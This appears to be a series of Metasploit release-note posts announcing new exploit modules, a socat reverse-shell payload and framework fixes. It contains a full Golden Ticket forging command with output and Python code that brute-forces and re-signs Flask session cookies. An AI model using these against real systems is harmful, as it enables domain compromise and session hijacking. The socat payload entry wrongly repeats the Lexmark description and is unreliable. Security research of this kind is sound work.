  • HynekPetrak
  • whotwagner (new in 2023)
  • rtpt-erikgeiser
  • errorxyz (new in 2023)
  • e-lliot (new in 2023)
  • gcarmix (new in 2023)
  • j0ev (new in 2023)
  • xaitax (new in 2023)
  • cudalac (new in 2023)
  • bka-dev
  • cnnrshd (new in 2023)
  • pbarry25 (new in 2023)
  • D00Movenok (new in 2023)
  • gardnerapp (new in 2023)
  • rodnt (new in 2023)
  • hahwul (new in 2023)
  • JustAnda7
  • Guilhem7 (new in 2023)
  • shellchocolat (new in 2023)
  • sdcampbell (new in 2023)
  • attl4s (new in 2023)
  • distortedsignal (new in 2023)
  • spmedia (new in 2023)
  • YiDa858 (new in 2023)
  • j-baines (new in 2023)
  • catatonicprime
  • vtoutain (new in 2023)
  • SubcomandanteMeowcos (new in 2023)
  • samueloph (new in 2023)
  • araout42 (new in 2023)
  • Pflegusch (new in 2023)
  • tekwizz123
  • rohitkumarankam (new in 2023)
  • jeffmcjunkin
  • MegaManSec
  • bugch3ck
  • raboof (new in 2023)
  • JBince (new in 2023)
  • Frycos (new in 2023)
  • neterum (new in 2023)
  • mkonda (new in 2023)
  • serializingme (new in 2023)
  • k0pak4
  • npm-cesium137-io
  • hamax97 (new in 2023)

Possible Web Service Removal

Metasploit Weekly Wrap-Up

Metasploit has support for running with a local database, or from a remote web service which can be initialized with msfdb init --component webservice. Future versions of Metasploit Framework may remove the msfdb remote webservice. Users that leverage this functionality are invited to react on an issue currently on GitHub to inform the maintainers that the feature is used.

New module content (1)

ZoneMinder Snapshots Command Injection

Authors: UnblvR and whotwagner
Type: Exploit
Pull request: #18434 contributed by whotwagner
Path: unix/webapp/zoneminder_snapshots

Description: This PR adds an exploit module for an unauthenticated remote code execution vulnerability in the video surveillance software Zoneminder (CVE-2023-26035).

Enhancements and features (1)

  • #18440 from adfoster-r7 - This alerts users that the remote web service will be removed. It prompts them to respond to an issue on GitHub if the removal will affect them.

Bugs fixed (1)

Documentation added (1)

  • #18524 from bradyjackson - Updates the modules/payload/android/meterpreter/reverse_tcp.md example to use the correct flags when generating a payload.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Improved Ticket Forging

Metasploit Weekly Wrap-Up

Metasploit’s admin/kerberos/forge_ticket module has been updated to work with Server 2022. In Windows Server 2022, Microsoft started requiring additional new PAC elements to be present - the PAC requestor and PAC attributes. The newly forged tickets will have the necessary elements added automatically based on the user-provided domain SID and user RID. For example:

msf6 auxiliary(admin/kerberos/forge_ticket) > run aes_key=4a52b73cf37ba06cf693c40f352e2f4d2002ef61f6031f64924fb50be1e23978 domain_sid=S-1-5-21-1242350107-3695253863-3717863007 USER_RID=500 domain=demo.local user=Administrator action=FORGE_GOLDEN

[*] TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230915213733_default_unknown_mit.kerberos.cca_219182.bin
[*] Primary Principal: Administrator@DEMO.LOCAL
Ccache version: 4

....
            Pac Requestor:
              SID: S-1-5-21-1242350107-3695253863-3717863007-500
            Pac Attributes:
              Flag length: 2
              Flags: 1
                .... .... .... .... .... .... .... ..0. Pac Was Requested: The PAC_WAS_REQUESTED bit is NOT SET
                .... .... .... .... .... .... .... ...1 Pac Was Given Implicitly: The PAC_WAS_GIVEN_IMPLICITLY bit is SET
            Pac Server Checksum:
              Signature: 1f94f52598b37bb9cf7e3995
            Pac Privilege Server Checksum:
              Signature: 79ec20b7d4b8e77e5c056563

The domain SID and user RIDs can be obtained using the auxiliary/gather/ldap_query module with the ENUM_DOMAIN and ENUM_ACCOUNTS actions.

New module content (5)

Apache Airflow 1.10.10 - Example DAG Remote Code Execution

Authors: Ismail E. Dawoodjee, Pepe Berba, and xuxiang
Type: Exploit
Pull request: #18283 contributed by ismaildawoodjee
Path: linux/http/apache_airflow_dag_rce

Description: This module exploits an unauthenticated command injection vulnerability by combining two critical vulnerabilities in Apache Airflow 1.10.10. The first, CVE-2020-11978, is an authenticated command injection vulnerability found in one of Airflow's example DAGs, example_trigger_target_dag, which allows any authenticated user to run arbitrary OS commands as the user running Airflow Worker/Scheduler. The second, CVE-2020-13927, is a default setting of Airflow 1.10.10 that allows unauthenticated access to Airflow's Experimental REST API to perform malicious actions such as creating the vulnerable DAG above.

Lexmark Device Embedded Web Server RCE

Authors: James Horseman, Zach Hanley, and jheysel-r7
Type: Exploit
Pull request: #18333 contributed by jheysel-r7
Path: linux/http/lexmark_faxtrace_settings

Description: This adds an exploit module that leverages an unauthenticated remote code execution vulnerability in certain Lexmark devices through 2023-02-19. This vulnerability (CVE-2023-26068) is only exposed if, when setting up the printer or device, the user selects "Set up Later" when asked if they would like to add an Admin user.

TOTOLINK Wireless Routers unauthenticated remote command execution vulnerability

Authors: Kazamayc (https://github.com/Kazamayc) and h00die-gr3y (h00die.gr3y@gmail.com)
Type: Exploit
Pull request: #18365 contributed by h00die-gr3y
Path: linux/http/totolink_unauth_rce_cve_2023_30013

Description: This adds an exploit module that leverages a command insertion vulnerability in TOTOLINK X5000R Wireless Gigabit Router firmware X5000R_V9.1.0u.6118_B20201102. This allows remote code execution as the user running the webserver. This user is typically the root user.

Ivanti Avalanche MDM Buffer Overflow

Authors: A researcher at Tenable and Ege BALCI (egebalci@pm.me)
Type: Exploit
Pull request: #18321 contributed by EgeBalci
Path: windows/misc/ivanti_avalanche_mdm_bof

Description: This PR adds an exploit module that targets Ivanti Avalanche MDM versions before v6.4.1, leveraging a buffer overflow condition.

Unix Command Shell, Reverse TCP (via socat)

Author: jheysel-r7
Type: Payload (Single)
Pull request: #18333 contributed by jheysel-r7
Path: cmd/unix/reverse_socat_tcp

Description: This adds an exploit module that leverages an unauthenticated remote code execution vulnerability in certain Lexmark devices through 2023-02-19. This vulnerability (CVE-2023-26068) is only exposed if, when setting up the printer or device, the user selects "Set up Later" when asked if they would like to add an Admin user.

Enhancements and features (5)

  • #18294 from zgoldman-r7 - Improves error messages when failing to interact with a network interface such as calling set LHOST=.
  • #18358 from zeroSteiner - This adds a new ThriftClient class for interacting with Thrift RPC services. It also updates the two existing Metasploit modules to use it.
  • #18361 from cgranleese-r7 - Updates the search command with the additional search keywords stage:, stager: and adapter:.
  • #18374 from h00die - Fixes a bug in 7 modules which specified the RelatedModules metadata incorrectly. Now the RelatedModules data is correctly shown to the user when running the info command.
  • #18377 from ErikWynter - This change adds a check to the auxiliary/scanner/smtp/smtp_relay scanner module to confirm whether the EHLO command is supported by the server. If not, the module will try to initiate the session using the HELO command instead.

Bugs fixed (4)

  • #18359 from smashery - Updates the admin/kerberos/forge_ticket module to work with newer Windows Server releases, in particular post Windows Server October 2022. Now, when forging Golden tickets, the forged PAC contains a PAC requestor element with the forged user SID, and additional PAC attributes.
  • #18369 from adfoster-r7 - This PR fixes a crash with OptAddressLocal that was caused by darwin AF_LINK having an empty string for its addr.
  • #18370 from adfoster-r7 - This PR fixes an issue where msfrpc would hang when updating saved command history.
  • #18378 from adfoster-r7 - Removes remaining debug logging from Prometheus Exporter.

Flask Cookies

Metasploit Weekly Wrap-Up

This week includes two modules related to Flask cookie signatures. One is specific to Apache Superset where session cookies can be resigned, allowing an attacker to elevate their privileges and dump the database connection strings. While adding this functionality, community member h00die also added a module for generically working with the default session cookies used by Flask. This generic module auxiliary/gather/python_flask_cookie_signer allows for bruteforcing common signing keys from a wordlist as well as decoding cookies and resigning cookies if the key is known (or recovered).
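As an added example (not code from the module, from Flask or from h00die), the following Python decodes a Flask session cookie and checks its signature against a list of candidate keys, which is the weak-key audit that the wordlist action described above performs; the session contents, the key "changeme" and the wordlist are all constructed here.

```python
"""Audit a Flask session cookie offline: decode the payload and check whether
its signature was produced by one of a list of candidate (default or weak)
SECRET_KEY values. Added example, not the Metasploit module's code; it
reimplements Flask's default itsdangerous scheme (salt "cookie-session",
HMAC-SHA1, HMAC key derivation) so it runs without Flask installed."""
import base64
import hashlib
import hmac
import json
import zlib

SALT = b"cookie-session"  # salt used by Flask's SecureCookieSessionInterface

def _b64e(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")

def _b64d(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def _signature(secret: str, value: bytes) -> str:
    # itsdangerous key_derivation="hmac": signing key = HMAC-SHA1(secret, salt)
    key = hmac.new(secret.encode(), SALT, hashlib.sha1).digest()
    return _b64e(hmac.new(key, value, hashlib.sha1).digest())

def decode_payload(cookie: str) -> dict:
    """Return the session dict. The payload is only base64 (and optionally
    zlib) encoded, never encrypted, so no key is needed to read it."""
    body = cookie.rsplit(".", 2)[0]    # cookie = [.]payload.timestamp.signature
    compressed = body.startswith(".")  # a leading "." marks zlib compression
    raw = _b64d(body[1:] if compressed else body)
    return json.loads(zlib.decompress(raw) if compressed else raw)

def find_signing_key(cookie: str, candidates):
    """Return the first candidate secret whose signature matches, or None.
    A hit means anyone who knows that secret can mint valid sessions, so the
    key must be rotated and existing sessions invalidated."""
    value, sig = cookie.rsplit(".", 1)
    for secret in candidates:
        if hmac.compare_digest(_signature(secret, value.encode()), sig):
            return secret
    return None

def sign_session(session: dict, secret: str, timestamp: int) -> str:
    """Build a Flask-format cookie; used here only to construct sample input."""
    raw = json.dumps(session, separators=(",", ":")).encode()
    packed = zlib.compress(raw)
    body = "." + _b64e(packed) if len(packed) < len(raw) - 1 else _b64e(raw)
    ts = _b64e(timestamp.to_bytes((timestamp.bit_length() + 7) // 8, "big"))
    value = f"{body}.{ts}"
    return f"{value}.{_signature(secret, value.encode())}"

# Constructed sample: a session signed with the weak key "changeme".
SAMPLE_COOKIE = sign_session({"user_id": 7, "role": "viewer"}, "changeme", 1694000000)
WEAK_KEYS = ["secret", "password", "changeme", "development"]  # constructed wordlist
```

Run `find_signing_key` against cookies issued by your own deployment; any match against a default or wordlist key is a finding in itself, independent of whether an attacker has used it yet.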

New module content (12)

Apache Superset Signed Cookie Priv Esc

Authors: Naveen Sunkavally, Spencer McIntyre, h00die, and paradoxis
Type: Auxiliary
Pull request: #18180 contributed by h00die
Path: auxiliary/gather/apache_superset_cookie_sig_priv_esc
AttackerKB reference: CVE-2023-27524

Description: This adds two modules for targeting vulnerabilities related to the signing of Flask's session cookies. One of them exploits a vulnerability in Apache Superset which is identified as CVE-2023-27524.

Prometheus API Information Gather

Author: h00die
Type: Auxiliary
Pull request: #18290 contributed by h00die
Path: auxiliary/gather/prometheus_api_gather

Description: This PR creates two modules: one to interrogate Prometheus API endpoints for information and one to query Prometheus Node Exporters for information. This is supported by a new Prometheus library and specs.

Prometheus Node Exporter And Windows Exporter Information Gather

Author: h00die
Type: Auxiliary
Pull request: #18290 contributed by h00die
Path: auxiliary/gather/prometheus_node_exporter_gather

Description: This PR creates two modules: one to interrogate Prometheus API endpoints for information, the other to query Prometheus Node Exporters for information. This is supported by a new Prometheus library and specs.

Python Flask Cookie Signer

Authors: Spencer McIntyre, h00die, and paradoxis
Type: Auxiliary
Pull request: #18180 contributed by h00die
Path: auxiliary/gather/python_flask_cookie_signer

Description: This adds two modules for targeting vulnerabilities related to the signing of Flask's session cookies. One of them exploits a vulnerability in Apache Superset which is identified as CVE-2023-27524.

Ivanti Sentry MICSLogService Auth Bypass resulting in RCE (CVE-2023-38035)

Authors: James Horseman, Zach Hanley, and jheysel-r7
Type: Exploit
Pull request: #18330 contributed by jheysel-r7
Path: exploits/linux/http/ivanti_sentry_misc_log_service
AttackerKB reference: CVE-2023-38035

Description: This PR adds an exploit module that targets Ivanti Sentry (formerly MobileIron Sentry). Ivanti Sentry is vulnerable to an authentication bypass which exposes API functionality, allowing for code execution in the context of the root user.

Kibana Timelion Prototype Pollution RCE

Authors: Gaetan Ferry, Michał Bentkowski, and h00die
Type: Exploit
Pull request: #18316 contributed by h00die
Path: exploits/linux/http/kibana_timelion_prototype_pollution_rce
AttackerKB reference: CVE-2019-7609

Description: Adds a module that exploits a prototype pollution vulnerability in the Kibana Timelion visualiser resulting in Remote Code Execution.

OpenTSDB 2.4.1 unauthenticated command injection

Authors: Daniel Abeles, Erik Wynter, and Gal Goldstein
Type: Exploit
Pull request: #18350 contributed by ErikWynter
Path: exploits/linux/http/opentsdb_key_cmd_injection
AttackerKB reference: CVE-2023-25826

Description: Adds a new module that exploits an unauthenticated command injection vulnerability in OpenTSDB through 2.4.1 resulting in root access.

VMware vRealize Log Insight Unauthenticated RCE

Authors: Ege BALCI and Horizon3.ai Attack Team
Type: Exploit
Pull request: #18273 contributed by EgeBalci
Path: exploits/linux/http/vmware_vrli_rce
CVE reference: ZDI-23-115

Description: This adds an exploit for VMware vRealize Log Insight versions prior to 8.10.2. It chains multiple vulnerabilities (CVE-2022-31706, CVE-2022-31704, CVE-2022-31711) together to achieve unauthenticated RCE.

Sonicwall

Authors: Ron Bowes and fulmetalpackets
Type: Exploit
Pull request: #18302 contributed by rbowes-r7
Path: exploits/multi/http/sonicwall_shell_injection_cve_2023_34124
AttackerKB reference: CVE-2023-34127

Description: This adds an exploit module that leverages a remote code execution in SonicWall GMS. Version 9.3.9320 (and likely earlier) is affected by this vulnerability identified as CVE-2023-34124.

WinRAR CVE-2023-38831 Exploit

Author: Alexander "xaitax" Hagenah
Type: Exploit
Pull request: #18341 contributed by xaitax
Path: exploits/windows/fileformat/winrar_cve_2023_38831
AttackerKB reference: CVE-2023-38831

Description: This PR adds a module covering CVE-2023-38831, a fileformat vulnerability affecting WinRAR 6.22.

LG Simple Editor Remote Code Execution

Authors: Ege Balcı and rgod
Type: Exploit
Pull request: #18329 contributed by EgeBalci
Path: exploits/windows/http/lg_simple_editor_rce
CVE reference: ZDI-23-1204

Description: This module exploits broken access control and directory traversal vulnerabilities to achieve unauthenticated remote code execution on LG Simple Editor versions <= v3.21. The module achieves code execution in the context of NT AUTHORITY\SYSTEM by uploading and executing a JSP payload.

Windows Common Log File System Driver (clfs.sys) Elevation of Privilege Vulnerability

Authors: Esteban.kazimirow, Ricardo Narvaja, and jheysel-r7
Type: Exploit
Pull request: #18250 contributed by jheysel-r7
Path: exploits/windows/local/cve_2023_28252_clfs_driver
AttackerKB reference: CVE-2023-28252

Description: Adds a new privilege escalation module that exploits a vulnerable clfs.sys driver on Windows to spawn a new NT AUTHORITY\SYSTEM Meterpreter session. The vulnerable driver comes installed by default on Windows 10 21H2, Windows 11 21H2 and Windows Server 2022 (Build 20348) operating systems.

Enhancements and features (8)

  • #17474 from prabhatjoshi321 - This PR adds support to the Capcom.sys driver LPE for Windows 11 21H1.
  • #18262 from cgranleese-r7 - Adds the ability to select favorite modules with the use command after running show favorites, similar to the search command.
  • #18270 from pbarry25 - Improves tab completion for the set and unset commands.
  • #18327 from h00die - Fixes an issue where specifying a TLS version in the ssl_version module would result in a NoMethodError.
  • #18349 from adfoster-r7 - Adds Meterpreter compatibility matrix generation to Github's acceptance test runs. Now, it's possible to visually see which Meterpreters support particular functionality.
  • #18354 from zeroSteiner - This PR moves the MSF tip to be displayed while Metasploit is loading. This is similar to what a lot of video games do (e.g. Skyrim).
  • #18356 from adfoster-r7 - This PR updates the Docker Golang version.
  • #18357 from adfoster-r7 - Adds additional error reporting to the Meterpreter integration tests.

Bugs fixed (2)

  • #17970 from YiDa858 - Fixes an error in nessus_db_import and nessus_scan_export commands that prevented them from completing successfully.
  • #18362 from adfoster-r7 - Fixes an edge case which could cause a new msfrpc console instance to hang forever.

Meterpreter Testing

Metasploit Weekly Wrap-Up

This week’s release adds new payload tests to our automated test suite. This is intended to help the team and community members identify issues and behavior discrepancies before changes are made. Payloads run on a variety of platforms, including Windows, Linux, and OS X, each of which has multiple Meterpreter implementations available; these are now tested to help ensure consistency. This should improve payload stability and make testing easier for community members who are contributing new features to the payloads.

New module content (4)

H2 Web Interface Create Alias RCE

Authors: Nairuz Abulhul, gambler, h00die, and h4ckNinja
Type: Exploit
Pull request: #18226 contributed by h00die
Path: exploits/linux/http/h2_webinterface_rce

Description: This PR adds an exploit against the H2 database's web console. An authenticated user can issue requests to invoke built-in functionality to execute arbitrary code. There is no CVE for this issue.

Maltrail Unauthenticated Command Injection

Authors: Chris Wild and Ege BALCI
Type: Exploit
Pull request: #18280 contributed by EgeBalci
Path: exploits/unix/http/maltrail_rce

Description: This PR adds a module for an unauthenticated RCE vulnerability in Maltrail, a malicious traffic detection system. The module author indicated that this vulnerability does not have a CVE associated with it as the vendor (product team in this case) declined to assign one.

RaspAP Unauthenticated Command Injection

Authors: Ege BALCI and Ismael0x00
Type: Exploit
Pull request: #18263 contributed by EgeBalci
Path: exploits/unix/http/raspap_rce
AttackerKB reference: CVE-2022-39986

Description: This PR adds an unauthenticated command injection module for the RaspAP webgui application.

Greenshot .NET Deserialization Fileformat Exploit

Authors: bwatters-r7 and p4r4bellum
Type: Exploit
Pull request: #18253 contributed by bwatters-r7
Path: exploits/windows/fileformat/greenshot_deserialize_cve_2023_34634
AttackerKB reference: CVE-2023-34634

Description: This PR adds a file-format exploit affecting Greenshot versions 1.3.274 and earlier, including the last stable release, 1.2.10.6.

Enhancements and features (1)

  • #18288 from adfoster-r7 - Adds stability enhancements to Meterpreter payloads. Additionally, this adds a large suite of automated sanity tests to Github Actions that verify OSX/Windows/Linux/Python/Java/PHP Meterpreter payloads work.

Bugs fixed (3)

  • #18275 from adfoster-r7 - Updates the module metadata for the Java reverse_http and reverse_https stagers so that they are treated as having a dynamic payload size instead of a static/fixed size. The size can vary because the Java payload contains a user-configurable HTTP callback URL and, combined with the Zip compression present in JAR files, the overall generated payload size changes as a result.
  • #18278 from rorymckinley - Fixes a crash when running the auxiliary/scanner/mysql/mysql_login module against newer versions of MySQL.
  • #18289 from zeroSteiner - Fixes a typo in the exploit/freebsd/http/citrix_formssso_target_rce docs.
